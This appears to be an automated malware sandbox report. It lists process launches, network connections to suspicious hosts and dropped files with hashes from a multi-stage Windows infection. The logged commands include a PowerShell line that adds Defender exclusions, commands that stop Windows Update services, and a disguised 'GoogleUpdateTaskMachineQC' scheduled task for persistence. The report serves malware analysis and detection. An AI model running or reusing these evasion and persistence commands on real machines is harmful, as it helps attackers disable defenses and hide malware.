"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\CFF3.exe

C:\Users\Admin\AppData\Local\Temp\CFF3.exe

C:\Users\Admin\AppData\Local\Temp\3F0A.exe

C:\Users\Admin\AppData\Local\Temp\3F0A.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\4257.exe

C:\Users\Admin\AppData\Local\Temp\4257.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\444C.exe

C:\Users\Admin\AppData\Local\Temp\444C.exe

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4976 -ip 4976

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 776

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask

C:\Users\Admin\AppData\Roaming\bvtrhjj

C:\Users\Admin\AppData\Roaming\bvtrhjj

C:\Users\Admin\AppData\Roaming\bbtrhjj

C:\Users\Admin\AppData\Roaming\bbtrhjj

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Roaming\bvtrhjj

C:\Users\Admin\AppData\Roaming\bvtrhjj

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 81.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
RU 5.42.92.211:80 5.42.92.211 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
N/A 224.0.0.251:5353 udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 bytecloudasa.website udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 39.212.67.172.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 38.148.119.40.in-addr.arpa udp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.55:19071 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 162.61.21.104.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 udp

Files

memory/1640-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1640-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3268-2-0x0000000002710000-0x0000000002726000-memory.dmp

memory/1640-3-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\62CC.exe

MD5 6e6ec8980dca281b098eb1bf5c3a6f99
SHA1 f74129680e21f2073f5f4c9d39b7120f72b0a208
SHA256 183e5a913132b82f31ae280e5a092ee98caf1118ffcff96f467cf5f0200ad7a9
SHA512 4056ae72f57130fe9f7bb03eddf8b0e85ecd2e00d93bddd9da7e325d7207eea8b94d3a66fbfa72bc51f02bcc96cb404f71c51045cf2a680f0123f528f728d00b

C:\Users\Admin\AppData\Local\Temp\62CC.exe

MD5 6e6ec8980dca281b098eb1bf5c3a6f99
SHA1 f74129680e21f2073f5f4c9d39b7120f72b0a208
SHA256 183e5a913132b82f31ae280e5a092ee98caf1118ffcff96f467cf5f0200ad7a9
SHA512 4056ae72f57130fe9f7bb03eddf8b0e85ecd2e00d93bddd9da7e325d7207eea8b94d3a66fbfa72bc51f02bcc96cb404f71c51045cf2a680f0123f528f728d00b

C:\Users\Admin\AppData\Local\Temp\6FCD.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

C:\Users\Admin\AppData\Local\Temp\6FCD.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

C:\Users\Admin\AppData\Local\Temp\776F.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\776F.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\7EF2.exe

MD5 c6dcaa9b9d234fba471592f67bbed65c
SHA1 ddd52620fd70c51b5f604dfdffc83c02841898c6
SHA256 b2dd68e9fcfb768c675ee00730018d4847fe3df812837162a1b7ed483f6920a0
SHA512 1790d5dd3237991d90cf9290a3916aa554cafd5de27e877072d5af6733948a245380910593ae52ef4b61b0cff93874423016cb18a8b8b4640ddb1cef9824894b

C:\Users\Admin\AppData\Local\Temp\7EF2.exe

MD5 c6dcaa9b9d234fba471592f67bbed65c
SHA1 ddd52620fd70c51b5f604dfdffc83c02841898c6
SHA256 b2dd68e9fcfb768c675ee00730018d4847fe3df812837162a1b7ed483f6920a0
SHA512 1790d5dd3237991d90cf9290a3916aa554cafd5de27e877072d5af6733948a245380910593ae52ef4b61b0cff93874423016cb18a8b8b4640ddb1cef9824894b

C:\Users\Admin\AppData\Local\Temp\8675.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Temp\8675.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

memory/4212-31-0x0000000000010000-0x000000000001A000-memory.dmp

memory/1452-33-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8F40.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/1452-36-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1452-38-0x0000000000400000-0x0000000000433000-memory.dmp

memory/220-39-0x0000000000400000-0x000000000043E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8F40.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Nw86rk.exe

MD5 3d269c5ae178789d40051b9b0daf7bc2
SHA1 bf9a901740b8fbc74c514382a18edd7eed0fea1f
SHA256 964a6712b6e047938eeca6ccac88b2e2085fdd64f3562893b5a5a42667982fbd
SHA512 01e7d6fbd6f87d6c7256130d4518659fac0b4c0a9e5459ec848fea0a4a1d50c9a8dd8fb8265536b7a907f81f873aa80774fab82df8558dbaa155d1d3ca5515b5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

MD5 693c6c86eb7499b1d4bb6bbc65db4c2d
SHA1 8cca414c23ea2daf31a1d94eb26fee12921c3f65
SHA256 9ef0773421dcfbaa3f1f98f3d569538a63adb0df6e68ce92cef6016baf181165
SHA512 5ed8f92f95ff2c63bb567fdf9a4b6117c4fbea0a9d73691dc402271f4c3bb623bd86417af034f23a5fedf37520e07da72284bffa735afcf0fc832ef553ab00d2

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

MD5 693c6c86eb7499b1d4bb6bbc65db4c2d
SHA1 8cca414c23ea2daf31a1d94eb26fee12921c3f65
SHA256 9ef0773421dcfbaa3f1f98f3d569538a63adb0df6e68ce92cef6016baf181165
SHA512 5ed8f92f95ff2c63bb567fdf9a4b6117c4fbea0a9d73691dc402271f4c3bb623bd86417af034f23a5fedf37520e07da72284bffa735afcf0fc832ef553ab00d2

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

MD5 eb0dd850df8c60600b6a0da57bc332c0
SHA1 205abf9bd526db8471a67ea9655996aebfe7a14c
SHA256 7311b1a64fd4ba02cb63567080ba6976c826244577a8bc685b06a843551ed3f4
SHA512 0059cc23beb8aa5985bc7838b2f94efe67947f782cbda3de7d15f5dae1069749d949415f702d1131b59c75f33450556abf1464bfda4ca6cb792450b6b49698a0

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

MD5 eb0dd850df8c60600b6a0da57bc332c0
SHA1 205abf9bd526db8471a67ea9655996aebfe7a14c
SHA256 7311b1a64fd4ba02cb63567080ba6976c826244577a8bc685b06a843551ed3f4
SHA512 0059cc23beb8aa5985bc7838b2f94efe67947f782cbda3de7d15f5dae1069749d949415f702d1131b59c75f33450556abf1464bfda4ca6cb792450b6b49698a0

memory/4212-52-0x00007FFD11530000-0x00007FFD11FF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

MD5 f1d32094252c66f6f22bd4c8c1acd996
SHA1 44edc6c2dc8f92290f29074abd25ea28bdc91393
SHA256 16dc74bd958a00a9a29845130529f12979f0e440e6e2139fcfdabe1dbfd0409c
SHA512 f44ce7e2ad437dc70eb7520c3776f62bfc7b642a652df138b162c63e71e2838ff1bf5fdeba6b2577ef11638945619a77d82a6382a220ca11536caa9c1ab9afef

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

MD5 f1d32094252c66f6f22bd4c8c1acd996
SHA1 44edc6c2dc8f92290f29074abd25ea28bdc91393
SHA256 16dc74bd958a00a9a29845130529f12979f0e440e6e2139fcfdabe1dbfd0409c
SHA512 f44ce7e2ad437dc70eb7520c3776f62bfc7b642a652df138b162c63e71e2838ff1bf5fdeba6b2577ef11638945619a77d82a6382a220ca11536caa9c1ab9afef

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

MD5 337bcef68d1505c1b939d9419b5ba2fa
SHA1 da7994b8e3413d1737f4487bbf2fd3d86e3298ab
SHA256 52067f320a43821e6a63a7aac95e9837f00b0ebe475b95c8974042f575fe6b8d
SHA512 bde954f048b432832482e388c6f31f83a5ecead26f152cce9b6964a00fcac16072583dccc5e7d1d86fcb2d0037426837dff71515d87451315ff11aab562e26ae

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

MD5 93153fed74f88b04dc6a7b755a7a9e63
SHA1 abb217c14a0663a01b08dffef53031d629f63f20
SHA256 118099f06926963b224d12604b462b580f1798f46e0f950ae9b1343d71c02c79
SHA512 cfb206d3883500371c731be4557c6fc64b98392accf361e16b44c44fd0b7537bf456b34e1c54d11417c69d8f5bd6bbd794459c547790013af063e52746aeefe5

memory/220-78-0x0000000073870000-0x0000000074020000-memory.dmp

memory/1452-79-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

MD5 337bcef68d1505c1b939d9419b5ba2fa
SHA1 da7994b8e3413d1737f4487bbf2fd3d86e3298ab
SHA256 52067f320a43821e6a63a7aac95e9837f00b0ebe475b95c8974042f575fe6b8d
SHA512 bde954f048b432832482e388c6f31f83a5ecead26f152cce9b6964a00fcac16072583dccc5e7d1d86fcb2d0037426837dff71515d87451315ff11aab562e26ae

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/436-88-0x0000000000400000-0x0000000000433000-memory.dmp

memory/436-89-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1452-93-0x0000000000400000-0x0000000000433000-memory.dmp

memory/436-92-0x0000000000400000-0x0000000000433000-memory.dmp

memory/220-90-0x0000000007B50000-0x00000000080F4000-memory.dmp

memory/220-94-0x0000000007690000-0x0000000007722000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8DE3.tmp\8DE4.tmp\8DE5.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe

MD5 4efc0d118a80d9e01765d803b8a2cf61
SHA1 70ef64b40c65b03a1e98afb0b842959464b30cae
SHA256 42e02486e940d9b85523ad4382cf67d2924f552bc15d919f77b9a3fd1dfa4f03
SHA512 f3b84c830c954c417a454028aad4b30949b41690e451dbd7aa58c40c73f49e41e3a14666090b76894ee8bbe7647e24797b32833417bc6959fa143ada8c59f948

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe

MD5 4efc0d118a80d9e01765d803b8a2cf61
SHA1 70ef64b40c65b03a1e98afb0b842959464b30cae
SHA256 42e02486e940d9b85523ad4382cf67d2924f552bc15d919f77b9a3fd1dfa4f03
SHA512 f3b84c830c954c417a454028aad4b30949b41690e451dbd7aa58c40c73f49e41e3a14666090b76894ee8bbe7647e24797b32833417bc6959fa143ada8c59f948

memory/904-99-0x0000000073870000-0x0000000074020000-memory.dmp

memory/904-100-0x00000000009E0000-0x0000000000A1E000-memory.dmp

memory/220-102-0x0000000007650000-0x0000000007660000-memory.dmp

memory/904-101-0x0000000007750000-0x0000000007760000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1222f8c867acd00b1fc43a44dacce158
SHA1 586ba251caf62b5012a03db9ba3a70890fc5af01
SHA256 1e451cb9ffe74fbd34091a1b8d0ab2158497c19047b3416d89e55f498aae264a
SHA512 ef3f2fc1cedfc28fb530c710219b8e9eb833a2f344b91d3ffb2d82d7bbedbc223f4b60a38bea35b72eb706e4880ffcbb9256a9768f39bae95c5544be0f503916

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1222f8c867acd00b1fc43a44dacce158
SHA1 586ba251caf62b5012a03db9ba3a70890fc5af01
SHA256 1e451cb9ffe74fbd34091a1b8d0ab2158497c19047b3416d89e55f498aae264a
SHA512 ef3f2fc1cedfc28fb530c710219b8e9eb833a2f344b91d3ffb2d82d7bbedbc223f4b60a38bea35b72eb706e4880ffcbb9256a9768f39bae95c5544be0f503916

memory/904-110-0x0000000007870000-0x000000000787A000-memory.dmp

\??\pipe\LOCAL\crashpad_960_SWADKELXPGKUDJOS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/904-122-0x0000000008840000-0x0000000008E58000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5ef174a8d0450a1e56ffb67741c098ec
SHA1 d05e9c48df3192f5cf560f0c9a5dcc3ada1bf854
SHA256 7979f7eb794ac1427539efe169cfed4fd76303cdecc764187f5d071056b380dd
SHA512 638e5478fe362b6a794109620b954411ae6be913f559531dfe1eb651de100f6829c6256e92167d69706f9a55355a864e590fefc94f408dd0d2c4b2b519e06609

memory/220-137-0x0000000007A40000-0x0000000007B4A000-memory.dmp

memory/904-138-0x0000000007A40000-0x0000000007A52000-memory.dmp

memory/904-139-0x0000000007AA0000-0x0000000007ADC000-memory.dmp

memory/904-140-0x0000000008220000-0x000000000826C000-memory.dmp

memory/4212-141-0x00007FFD11530000-0x00007FFD11FF1000-memory.dmp

memory/220-146-0x0000000073870000-0x0000000074020000-memory.dmp

\??\pipe\LOCAL\crashpad_4460_MFHRWLWKOOZYXDYQ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4212-154-0x00007FFD11530000-0x00007FFD11FF1000-memory.dmp

memory/904-207-0x0000000073870000-0x0000000074020000-memory.dmp

memory/220-209-0x0000000007650000-0x0000000007660000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b7d28091485b539f5cac80cb1bfde82b
SHA1 e87608913b2b5df14c34b5c15ef97edf8501d1b7
SHA256 b73371da53d2a7906591f6ae9cf1b208b6f0f4a0b6e1c49b043d7caa5a735391
SHA512 5744eca81ae9616c7bea6af6d233bc9e3b62304209a406b62cfc45c761dccf67357db795f9a7302b6ba0b2c0f2b364c2e72493a94bec31ba4cb30fab296fa129

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 df279ff5b3a2da0c10fa626451e126a6
